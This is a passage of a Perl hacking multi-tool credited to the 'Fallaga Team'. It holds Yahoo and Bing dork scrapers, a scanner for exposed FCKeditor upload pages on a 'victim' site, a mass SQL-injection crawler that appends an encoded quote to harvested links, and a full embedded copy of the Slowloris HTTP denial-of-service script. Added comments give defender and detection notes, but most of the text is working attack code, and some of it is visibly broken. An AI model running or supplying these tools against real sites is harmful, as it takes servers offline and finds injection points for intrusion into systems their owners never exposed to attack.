  2155.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2156.            }
  2157.        }
  2158.    } return @list;
  2159. }
  2160.  
  2161. sub perancis() {
  2162.    my @list;
  2163.  my $key = $_[0];
  2164.  my $b   = 0;
  2165.    for (my $i=1; $i<=200; $i+=100) {
  2166.        my $search = ("http://fr.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
  2167.        my $res = &search_engine_query($search);
  2168.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
  2169.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2170.            }
  2171.        }
  2172.    }
  2173. return @list;
  2174. }
  2175.  
  2176. sub italia() {
  2177.    my @list;
  2178.  my $key = $_[0];
  2179.  my $b   = 0;
  2180.    for (my $i=1; $i<=200; $i+=100) {
  2181.        my $search = ("http://it.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
  2182.        my $res = &search_engine_query($search);
  2183.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
  2184.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2185.            }
  2186.        }
  2187.    } return @list;
  2188. }
  2189.  
  2190. sub turki() {
  2191.    my @list;
  2192.  my $key = $_[0];
  2193.  my $b   = 0;
  2194.    for (my $i=1; $i<=200; $i+=100) {
  2195.        my $search = ("http://tr.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
  2196.        my $res = &search_engine_query($search);
  2197.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
  2198.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2199.            }
  2200.        }
  2201.    } return @list;
  2202. }
  2203.  
  2204. sub polandia() {
  2205.    my @list;
  2206.  my $key = $_[0];
  2207.  my $b   = 0;
  2208.    for (my $i=1; $i<=200; $i+=100) {
  2209.        my $search = ("http://pl.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
  2210.        my $res = &search_engine_query($search);
  2211.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
  2212.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2213.            }
  2214.        }
  2215.    } return @list;
  2216. }
  2217.  
  2218. sub filipina() {
  2219.    my @list;
  2220.  my $key = $_[0];
  2221.  my $b   = 0;
  2222.    for (my $i=1; $i<=200; $i+=100) {
  2223.        my $search = ("http://ph.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
  2224.        my $res = &search_engine_query($search);
  2225.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
  2226.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2227.            }
  2228.        }
  2229.    } return @list;
  2230. }
  2231.  
  2232. sub inggris() {
  2233.    my @list;
  2234.  my $key = $_[0];
  2235.  my $b   = 0;
  2236.    for (my $i=1; $i<=200; $i+=100) {
  2237.        my $search = ("http://uk.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
  2238.        my $res = &search_engine_query($search);
  2239.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
  2240.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2241.            }
  2242.        }
  2243.    } return @list;
  2244. }
  2245.  
  2246. sub peru() {
  2247.    my @list;
  2248.  my $key = $_[0];
  2249.  my $b   = 0;
  2250.    for (my $i=1; $i<=200; $i+=100) {
  2251.        my $search = ("http://pe.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
  2252.        my $res = &search_engine_query($search);
  2253.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
  2254.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2255.            }
  2256.        }
  2257.    } return @list;
  2258. }
  2259.  
  2260. sub hongkong() {
  2261.    my @list;
  2262.  my $key = $_[0];
  2263.  my $b   = 0;
  2264.    for (my $i=1; $i<=200; $i+=100) {
  2265.        my $search = ("http://hk.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
  2266.        my $res = &search_engine_query($search);
  2267.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
  2268.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2269.            }
  2270.        }
  2271.    } return @list;
  2272. }
  2273.  
  2274. sub yunani() {
  2275.    my @list;
  2276.  my $key = $_[0];
  2277.  my $b   = 0;
  2278.    for (my $i=1; $i<=200; $i+=100) {
  2279.        my $search = ("http://gr.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
  2280.        my $res = &search_engine_query($search);
  2281.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
  2282.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2283.            }
  2284.        }
  2285.    } return @list;
  2286. }
  2287.  
  2288. sub finlandia() {
  2289.    my @list;
  2290.  my $key = $_[0];
  2291.  my $b   = 0;
  2292.    for (my $i=1; $i<=200; $i+=100) {
  2293.        my $search = ("http://fi.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
  2294.        my $res = &search_engine_query($search);
  2295.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
  2296.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2297.            }
  2298.        }
  2299.    } return @list;
  2300. }
  2301.  
  2302. sub kolombia() {
  2303.    my @list;
  2304.  my $key = $_[0];
  2305.  my $b   = 0;
  2306.    for (my $i=1; $i<=200; $i+=100) {
  2307.        my $search = ("http://co.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
  2308.        my $res = &search_engine_query($search);
  2309.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
  2310.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2311.            }
  2312.        }
  2313.    } return @list;
  2314. }
  2315.  
  2316. sub taiwan() {
  2317.    my @list;
  2318.  my $key = $_[0];
  2319.  my $b   = 0;
  2320.    for (my $i=1; $i<=200; $i+=100) {
  2321.        my $search = ("http://tw.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
  2322.        my $res = &search_engine_query($search);
  2323.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
  2324.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2325.            }
  2326.        }
  2327.    } return @list;
  2328. }
  2329.  
  2330. sub swiss() {
  2331.    my @list;
  2332.  my $key = $_[0];
  2333.  my $b   = 0;
  2334.    for (my $i=1; $i<=200; $i+=100) {
  2335.        my $search = ("http://ch.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
  2336.        my $res = &search_engine_query($search);
  2337.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
  2338.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2339.            }
  2340.        }
  2341.    } return @list;
  2342. }
  2343.  
  2344. sub mexico() {
  2345.    my @list;
  2346.        my $key = $_[0];
  2347.        my $b     = 0;
  2348.    for (my $i=1; $i<=200; $i+=100) {
  2349.        my $search = ("http://mx.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
  2350.        my $res = &search_engine_query($search);
  2351.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
  2352.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2353.            }
  2354.        }
  2355.    } return @list;
  2356. }
  2357. sub Uk() {
  2358.    my @list;
  2359.  my $key = $_[0];
  2360.  my $b   = 0;
  2361.    for (my $i=1; $i<=200; $i+=100) {
  2362.        my $search = ("http://co.uk.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
  2363.        my $res = &search_engine_query($search);
  2364.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
  2365.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2366.            }
  2367.        }
  2368.    } return @list;
  2369. }
  2370. sub Israel() {
  2371.    my @list;
  2372.  my $key = $_[0];
  2373.  my $b   = 0;
  2374.    for (my $i=1; $i<=200; $i+=100) {
  2375.        my $search = ("http://co.il.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
  2376.        my $res = &search_engine_query($search);
  2377.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
  2378.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2379.            }
  2380.        }
  2381.    } return @list;
  2382. }
  2383. sub french() {
  2384.    my @list;
  2385.  my $key = $_[0];
  2386.  my $b   = 0;
  2387.    for (my $i=1; $i<=200; $i+=100) {
  2388.        my $search = ("http://fr.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
  2389.        my $res = &search_engine_query($search);
  2390.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
  2391.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2392.            }
  2393.        }
  2394.    } return @list;
  2395. }
  2396. sub Tunisia() {
  2397.    my @list;
  2398.  my $key = $_[0];
  2399.  my $b   = 0;
  2400.    for (my $i=1; $i<=200; $i+=100) {
  2401.        my $search = ("http://tn.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
  2402.        my $res = &search_engine_query($search);
  2403.        while ($res =~ m/http\%3a\/\/(.+?)\//g) {
  2404.            if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2405.            }
  2406.        }
  2407.    } return @list;
  2408. }
  2409. ################################################
  2410. sub search_engine_query() {
  2411.        my $url = $_[0];
  2412.        $url =~ s/http:\/\///;
  2413.        my $host = $url;
  2414.        my $query = $url;
  2415.        my $page  = "";
  2416.        $host =~ s/href=\"?http:\/\///;
  2417.        $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
  2418.        $query =~ s/$host//;
  2419.        if ($query eq "") { $query = "/"; }
  2420.                eval {
  2421.                        my $sock = IO::Socket::INET->new(PeerAddr=>"$host", PeerPort=>"80", Proto=>"tcp") or return;
  2422.                        my $sget = "GET $query HTTP/1.0\r\n";
  2423.                        $sget .= "Host: $host\r\n";
  2424.                        $sget .= "Accept: */*\r\n";
  2425.                        $sget .= "User-Agent: $uagent\r\n";
  2426.                        $sget .= "Connetion: Close\r\n\r\n";
  2427.                        print $sock $sget;
  2428.                        my @pages = <$sock>;
  2429.                        $page = "@pages";
  2430.                        close($sock);
  2431.                };
  2432.        return $page;
  2433. }
  2434.  
  2435. sub clean() {
  2436.    my @cln = ();
  2437.    my %visit = ();
  2438.    foreach my $element (@_) {
  2439.        $element =~ s/\/+/\//g;
  2440.        next if $visit{$element}++;
  2441.        push @cln, $element;
  2442.    }
  2443.    return @cln;
  2444. }
  2445.  
  2446. sub links() {
  2447. my @l;
  2448. my $link=$_[0];
  2449. my $host=$_[0];
  2450. my $hdir=$_[0];
  2451. $hdir=~s/(.*)\/[^\/]*$/\1/;
  2452. $host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
  2453. $host.="/";
  2454. $link.="/";
  2455. $hdir.="/";
  2456. $host=~s/\/\//\//g;
  2457. $hdir=~s/\/\//\//g;
  2458. $link=~s/\/\//\//g;
  2459. push(@l,$link,$host,$hdir);
  2460. return @l;
  2461. }
  2462.  
  2463. sub getcontent() {
  2464.    my $url = $_[0];
  2465.    my $req = HTTP::Request->new(GET => $url);
  2466.    my $ua  = LWP::UserAgent->new();
  2467.    $ua->timeout(15);
  2468.    my $response = $ua->request($req);
  2469.    return $response->content;
  2470. }
  2471.  
# Appends its first argument to a per-day log file named
# "[<logdir><year>-<month>-<day>]SQLscan.log" (the square brackets are part of
# the file name). Dies if the file cannot be opened.
# NOTE(review): $logdir is not set anywhere in view; presumably a global from
# earlier in the file. It is interpolated into a two-argument open(), so its
# content decides the path that gets written.
sub printlog {
my ($logsec,$logmin,$loghour,$logmday,$logmon,$logyear,$logwday,$logyday,$logisdst)=localtime(time);
# Built but never used below; the file name uses the unpadded fields instead.
my $logtimestamp = sprintf("%4d-%02d-%02d,%02d:%02d:%02d",$logyear+1900,$logmon+1,$logmday,$loghour,$logmin,$logsec);
# localtime() months are 0-based and years are offset from 1900.
$logmon++;
$logyear=$logyear+1900;
my $log="[$logdir$logyear-$logmon-$logmday]SQLscan.log";
# Bareword handle, append mode.
open(lo,">>$log") or die "$log:$!";
# @_[0] is a one-element array slice; it prints the first argument.
print lo @_[0];
close(lo);
return;
# The second brace on the next line closes an enclosing block opened before
# this sub.
}}
  2483. }
# Menu option 11: probes one user-supplied site for FCKeditor file-manager
# test/upload pages and sample pages. Every path that answers with a success
# status is appended to FckEditor.txt in the current directory.
#
# Defender notes: the 17 paths in @path are useful access-log indicators; a
# burst of GETs for them from one client is this kind of probe. No agent
# string is set, so LWP's default libwww-perl User-Agent is sent. Removing the
# editor's bundled test/upload/sample pages from deployed sites, or denying
# access to them, makes every probe here return "Not Found".
if($targett eq '11')
{
system('cls');
system('title FckEditor Dir Tester');
                   {
use HTTP::Request;
use LWP::UserAgent;

system('cls');
system(' Title FckEditor Dir Tester');
system "color a";
print"\n";
print  "\t>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n";
print "\t>                    F4cK3 3d!t0r Dir Tester                         >\n";
print "\t>                                                                  >\n";
print "\t>                     Created By Fallag crx                          >\n";
print "\t>          fallaga  | Team                     >\n";
print "\t>                    Result In FckEditor.txt                       >\n";
print  "\t>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n";
print "\n";

print " Enter The Site\n\n Example: www.victim.com \n\n-> ";


$site=<STDIN>;
chomp $site;

# Adds the scheme and a trailing "/" when the input has no "http://". Every
# path below also starts with "/", so those requests contain "//" right after
# the host name.
if($site !~ /http:\/\//) { $site = "http://$site/"; };

print "\n";

# Fixed list of candidate paths; nothing is discovered dynamically.
@path = ('/editor/editor/filemanager/connectors/uploadtest.html',
'/editor/editor/filemanager/upload/test.html',
'/editor/editor/filemanager/browser/default/connectors/test.html',
'/editor/editor/filemanager/connectors/test.html',
'/admin/fckeditor/editor/filemanager/connectors/test.html',
'/FCKeditor/editor/filemanager/upload/test.html',
'/Fckeditor/editor/filemanager/browser/default/connectors/test.html',
'/admin/FCKeditor/editor/filemanager/connectors/uploadtest.html',
'/admin/FCKeditor/editor/filemanager/upload/test.html',
'/Fckeditor/editor/filemanager/connectors/test.html',
'/admin/fckeditor/editor/filemanager/browser/default/connectors/test.html',
'/FCKeditor/editor/filemanager/connectors/uploadtest.html',
'/js/fckeditor/editor/filemanager/connectors/test.html',
'/admin/FCKeditor/editor/filemanager/connectors/test.html',
'/admin/FCKeditor/editor/fckeditor.html',
'/include/fckeditor/_samples/default.html',
'/include/fckeditor/editor/filemanager/connectors/test.html',);


foreach $fckeditor(@path){

$url = $site.$fckeditor;
$req = HTTP::Request->new(GET=>$url);
$useragent = LWP::UserAgent->new();

$response = $useragent->request($req);

# Only the status is tested; the body is never inspected, so a site that
# answers 200 for unknown paths is reported as a hit for all 17 entries.
if ($response->is_success){
print "$fckeditor\n";
# $fckeditor is a path string, which is 0 in numeric context, so this drops
# the first 13 characters of $url.
$url = substr($url, $fckeditor + 13);
# Cuts $url at the first double quote; a URL built above normally has none,
# so index() gives -1 and substr() drops the last character.
$fckeditor = substr($url, 0, index($url, '"'));
# Bareword handle; the result of open() is not checked.
open (txt,">>FckEditor.txt");
print txt  $fckeditor,"\n";
close(txt);
print "=> Dir Found : $url\n";
}
else {
print "=> Not Found : $fckeditor\n";
}}
}}
# Menu option 16: an embedded copy of the Slowloris slow-header HTTP
# denial-of-service script (the status messages below name it). This first part
# parses options, prompts for the target and fills in defaults.
#
# Defender notes: the technique depends on the server keeping connections open
# while request headers trickle in. Header-read timeouts (for example Apache
# mod_reqtimeout or nginx client_header_timeout), per-client connection limits,
# and a buffering reverse proxy in front of the origin are the usual
# counter-measures.
if($targett eq '16')
{
system('cls');
system('title DDOS');
                   {
use strict;
use IO::Socket::INET;
use IO::Socket::SSL;
use Getopt::Long;
use Config;


$SIG{'PIPE'} = 'IGNORE';    # a write to a socket the peer closed must not kill the process


my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections );
my ( $cache, $httpready, $method, $ssl, $rand, $tcpto );
# Command-line switches are still read from @ARGV here, even though the tool
# is menu driven.
my $result = GetOptions(
   'shost=s'   => \$shost,
   'dns=s'     => \$host,
   'httpready' => \$httpready,
   'num=i'     => \$connections,
   'cache'     => \$cache,
   'port=i'    => \$port,
   'https'     => \$ssl,
   'tcpto=i'   => \$tcpto,
   'test'      => \$test,
   'timeout=i' => \$timeout,
   'version'   => \$version,
);

# The interactive prompt always overwrites any value given with -dns.
print "[+] Enter Url For DDOS: ";
chomp ($host = <STDIN>);

if ($version) {
   print "Version 0.7\n";
   exit;
}

unless ($port) {
   $port = 80;
   print "Defaulting to port 80.\n";
}


# TCP connect timeout, in seconds.
unless ($tcpto) {
   $tcpto = 5;
   print "Defaulting to a 5 second tcp connection timeout.\n";
}


# Outside -test mode: $timeout is the pause between keep-alive header lines,
# $connections the number of sockets requested.
unless ($test) {
   unless ($timeout) {
       $timeout = 100;
       print "Defaulting to a 100 second re-try timeout.\n";
   }
   unless ($connections) {
       $connections = 1000;
       print "Defaulting to 1000 connections.\n";
   }
}


my $usemultithreading = 0;
if ( $Config{usethreads} ) {
   print "Multithreading enabled.\n";
   $usemultithreading = 1;
   # "use" is resolved at compile time, so both modules are loaded whether or
   # not this branch runs.
   use threads;
   use threads::shared;
}
else {
   print "No multithreading capabilites found!\n";
   print "Slowloris will be slower than normal as a result.\n";
}


# Counters shared between worker threads.
my $packetcount : shared     = 0;
my $failed : shared          = 0;
my $connectioncount : shared = 0;


srand() if ($cache);


# -shost overrides the value placed in the Host: header.
if ($shost) {
   $sendhost = $shost;
}
else {
   $sendhost = $host;
}
# -httpready switches the request line from GET to POST.
if ($httpready) {
   $method = "POST";
}
else {
   $method = "GET";
}
  2651.  
  2652.  
# -test mode opens a single connection and measures how long the server keeps
# an unfinished request open; every other run starts the connection workers.
#
# Detection notes: the request never sends the blank line that ends the
# header block. It declares "Content-Length: 42" and is followed at long
# intervals by "X-a: b" header lines. The User-Agent is a fixed string whose
# ".NET CLR 2.0.503l3" token contains a lowercase "l" where a digit would be
# expected, which makes it a convenient exact-match signature.
if ($test) {
   # Delays, in seconds, tried one after another on the same socket.
   my @times = ( "2", "30", "90", "240", "500" );
   my $totaltime = 0;
   foreach (@times) {
       $totaltime = $totaltime + $_;
   }
   $totaltime = $totaltime / 60;
   print "This test could take up to $totaltime minutes.\n";


   my $delay   = 0;
   my $working = 0;
   my $sock;


   # Same connect parameters for TLS and plain TCP; only the socket class differs.
   if ($ssl) {
       if (
           $sock = new IO::Socket::SSL(
               PeerAddr => "$host",
               PeerPort => "$port",
               Timeout  => "$tcpto",
               Proto    => "tcp",
           )
         )
       {
           $working = 1;
       }
   }
   else {
       if (
           $sock = new IO::Socket::INET(
               PeerAddr => "$host",
               PeerPort => "$port",
               Timeout  => "$tcpto",
               Proto    => "tcp",
           )
         )
       {
           $working = 1;
       }
   }
   if ($working) {
       # -cache appends a random query string to the request path.
       if ($cache) {
           $rand = "?" . int( rand(99999999999999) );
       }
       else {
           $rand = "";
       }
       # Deliberately incomplete request: no terminating empty line.
       my $primarypayload =
           "GET /$rand HTTP/1.1\r\n"
         . "Host: $sendhost\r\n"
         . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
         . "Content-Length: 42\r\n";
       if ( print $sock $primarypayload ) {
           print "Connection successful, now comes the waiting game...\n";
       }
       else {
           print
"That's odd - I connected but couldn't send the data to $host:$port.\n";
           print "Is something wrong?\nDying.\n";
           exit;
       }
   }
   else {
       print "Uhm... I can't connect to $host:$port.\n";
       print "Is something wrong?\nDying.\n";
       exit;
   }
   # After each delay one more header line is written; a failed write means
   # the server has dropped the connection.
   for ( my $i = 0 ; $i <= $#times ; $i++ ) {
       print "Trying a $times[$i] second delay: \n";
       sleep( $times[$i] );
       if ( print $sock "X-a: b\r\n" ) {
           print "\tWorked.\n";
           $delay = $times[$i];
       }
       else {
           # Tests whether a __WARN__ handler is installed; none is set in
           # the visible code.
           if ( $SIG{__WARN__} ) {
               $delay = $times[ $i - 1 ];
               last;
           }
           print "\tFailed after $times[$i] seconds.\n";
       }
   }


   # Both branches exit, so the "$delay < 166" advice below is never reached.
   if ( print $sock "Connection: Close\r\n\r\n" ) {
       print "Okay that's enough time. Slowloris closed the socket.\n";
       print "Use $delay seconds for -timeout.\n";
       exit;
   }
   else {
       print "Remote server closed socket.\n";
       print "Use $delay seconds for -timeout.\n";
       exit;
   }
   if ( $delay < 166 ) {
       print <<EOSUCKS2BU;
Since the timeout ended up being so small ($delay seconds) and it generally
takes between 200-500 threads for most servers and assuming any latency at
all...  you might have trouble using Slowloris against this target.  You can
tweak the -timeout flag down to less than 10 seconds but it still may not
build the sockets in time.
EOSUCKS2BU
   }
}
else {
   print
"Connecting to $host:$port every $timeout seconds with $connections sockets:\n";


   # Threaded Perl: workers are spawned by domultithreading(); otherwise one
   # loop handles every socket.
   if ($usemultithreading) {
       domultithreading($connections);
   }
   else {
       doconnections( $connections, $usemultithreading );
   }
}
  2770.  
  2771.  
# Worker loop: keeps up to $num connections to $host:$port open. Each pass
# (re)opens every slot that is not marked working and sends it the unfinished
# request, writes one "X-a: b" header line to every working slot, then sleeps
# $timeout seconds. The loop never returns.
#
# $host, $port, $ssl, $tcpto, $cache, $method, $sendhost, $timeout and the
# shared counters come from the enclosing block. The second parameter is
# accepted but not used in the body.
#
# Server-side view: many connections from one client that each hold a request
# with no end-of-headers line and receive one short header per interval.
sub doconnections {
   my ( $num, $usemultithreading ) = @_;
   my ( @first, @sock, @working );
   my $failedconnections = 0;
   # Slots are 1-based; index 0 is never used. @first is filled but not read.
   $working[$_] = 0 foreach ( 1 .. $num );
   $first[$_]   = 0 foreach ( 1 .. $num );
   while (1) {
       $failedconnections = 0;
       print "\t\tBuilding sockets.\n";
       foreach my $z ( 1 .. $num ) {
           if ( $working[$z] == 0 ) {
               if ($ssl) {
                   if (
                       $sock[$z] = new IO::Socket::SSL(
                           PeerAddr => "$host",
                           PeerPort => "$port",
                           Timeout  => "$tcpto",
                           Proto    => "tcp",
                       )
                     )
                   {
                       $working[$z] = 1;
                   }
                   else {
                       $working[$z] = 0;
                   }
               }
               else {
                   if (
                       $sock[$z] = new IO::Socket::INET(
                           PeerAddr => "$host",
                           PeerPort => "$port",
                           Timeout  => "$tcpto",
                           Proto    => "tcp",
                       )
                     )
                   {
                       $working[$z] = 1;
                       # The counter is an estimate: three packets are assumed
                       # for the TCP handshake (SYN, SYN+ACK, ACK).
                       $packetcount = $packetcount + 3;
                   }
                   else {
                       $working[$z] = 0;
                   }
               }
               if ( $working[$z] == 1 ) {
                   # -cache appends a random query string to the request path.
                   if ($cache) {
                       $rand = "?" . int( rand(99999999999999) );
                   }
                   else {
                       $rand = "";
                   }
                   # Same unfinished request as in -test mode, but with the
                   # configured method (GET or POST).
                   my $primarypayload =
                       "$method /$rand HTTP/1.1\r\n"
                     . "Host: $sendhost\r\n"
                     . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
                     . "Content-Length: 42\r\n";
                   my $handle = $sock[$z];
                   if ($handle) {
                       print $handle "$primarypayload";
                       # Tests whether a __WARN__ handler is installed, not
                       # whether the print failed; none is set in the visible
                       # code.
                       if ( $SIG{__WARN__} ) {
                           $working[$z] = 0;
                           close $handle;
                           $failed++;
                           $failedconnections++;
                       }
                       else {
                           $packetcount++;
                           $working[$z] = 1;
                       }
                   }
                   else {
                       $working[$z] = 0;
                       $failed++;
                       $failedconnections++;
                   }
               }
               else {
                   $working[$z] = 0;
                   $failed++;
                   $failedconnections++;
               }
           }
       }
       print "\t\tSending data.\n";
       foreach my $z ( 1 .. $num ) {
           if ( $working[$z] == 1 ) {
               if ( $sock[$z] ) {
                   my $handle = $sock[$z];
                   # One more header line keeps the request "in progress".
                   if ( print $handle "X-a: b\r\n" ) {
                       $working[$z] = 1;
                       $packetcount++;
                   }
                   else {
                       # Write failed: mark the slot for rebuilding next pass.
                       $working[$z] = 0;
                       $failed++;
                       $failedconnections++;
                   }
               }
               else {
                   # No handle in this slot: mark it for rebuilding next pass.
                   $working[$z] = 0;
                   $failed++;
                   $failedconnections++;
               }
           }
       }
       print
"Current stats:\tSlowloris has now sent $packetcount packets successfully.\nThis thread now sleeping for $timeout seconds...\n\n";
       sleep($timeout);
   }
}
  2884.  
  2885.  
# Starts one doconnections() worker thread per 50 requested connections
# (rounded up), then waits in the calling thread.
sub domultithreading {
   my ($num) = @_;
   my @thrs;
   my $i                    = 0;
   my $connectionsperthread = 50;
   while ( $i < $num ) {
       # @thrs is indexed by connection offset (0, 50, 100, ...), so it is sparse.
       $thrs[$i] =
         threads->create( \&doconnections, $connectionsperthread, 1 );
       $i += $connectionsperthread;
   }
   # The thread list is read once and never refreshed, so with more than one
   # worker this loop spins without sleeping, resetting the shared $failed
   # counter on every pass.
   my @threadslist = threads->list();
   while ( $#threadslist > 0 ) {
       $failed = 0;
}}
  2900. }}
# Menu option 3 ("Dorker Bing"): declares the working variables, prints a
# banner and a two-item menu, then calls sql_scan() when the user enters 1.
if($targett eq '3')
{
system('cls');
system('title Dorker Bing');
                   {
use strict;
use warnings;
use HTTP::Request;
use LWP::UserAgent;

# Lexicals shared with sql_scan() below, which is defined inside this block.
my $dork;
my $url;
my $i;
my $request;
my $useragent;
my $response;
my $start;
my $end;
my $result;
my $fl;
my $link;
my $req;
my $ua;
my $result2;
my $res;
my $save;
my $pages;
my $page;
my $choice;
# Collects every URL that sql_scan() flags.
my @z;

print q{
################################
##      / SQLi Crawler /      ##
##       Fallaga Team       ##
##   ~ReCoded by Fallag crx~    ##
################################

};

# sql_scan() jumps back to this label with "goto" after each run.
MainMenu:

print "------------------------\n";
print "Enter [1] To Begin SQLi.\n";
print "Enter [2] To Exit.\n";
print "------------------------\n\n";
print "Your Choice: ";

chomp ($choice = <STDIN>);
print "\n";

# The menu offers 2 for exit, but the code tests for 5. Any input other than
# 1 or 5, including 2, falls through to the end of this block.
if ($choice eq 1) {&sql_scan}
if ($choice eq 5) {die;}
  2956.  
# Takes a search query ("dork") and a page count from the user, scrapes Bing
# result links, requests each link with "%27" (an encoded single quote)
# appended, and reports a link when the response body contains one of a fixed
# set of database error strings. It optionally appends the flagged links to
# Vulns.txt, then jumps back to the menu.
#
# Defender notes: the probe is error-based, so it only flags sites that echo
# database errors to the client. Parameterised queries and generic error pages
# remove the signal. In access logs it appears as GETs whose URL ends in %27;
# no agent string is set, so LWP's default libwww-perl User-Agent is sent.
sub sql_scan
{

print "[+] Enter Bing! dork: ";
chomp ($dork = <STDIN>);
print "\n";
print "[+] How Many Pages To Leech?: ";
chomp ($pages = <STDIN>);
print "\n";

# String concatenation, not arithmetic: an input of 3 gives the bound "31".
$page = $pages.'1';

print "[~] Crawling...\n\n";

# $i is passed as Bing's "first" result offset and advances by 11 per request.
for ($i = 0; $i <= $page; $i=$i+11)
{

# The dork is inserted into the URL without any escaping.
$url = "http://www.bing.com/search?q=$dork&go=&qs=n&sk=&sc=8-13&first=$i";

$request = HTTP::Request->new(GET => $url);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($request);
$result = $response->content;

# Result links are taken from the text between these two HTML fragments.
$start = '<h3><a href="';
$end = '" onmousedown=';

while ($result =~ m/$start(.*?)$end/g)

{
     $fl = $1;
     # %27 is a URL-encoded single quote.
     $link = $fl."%27";
     $req = HTTP::Request->new(GET => $link);
     $ua = LWP::UserAgent->new();
     $res = $ua->request($req);
     $result2 = $res->content;

      # MySQL-style error strings, matched case-insensitively.
      if ($result2=~ m/You have an error in your SQL syntax/i || $result2=~ m/Query failed/i || $result2=~ m/SQL query failed/i || $result2=~ m/mysql_fetch_/i || $result2=~ m/mysql_fetch_array/i || $result2 =~ m/mysql_num_rows/i || $result2 =~ m/The used SELECT statements have a different number of columns/i )
      {
        push @z, $link;
        print "[+] MySQL Vulnerable: $link\n\n";
      }

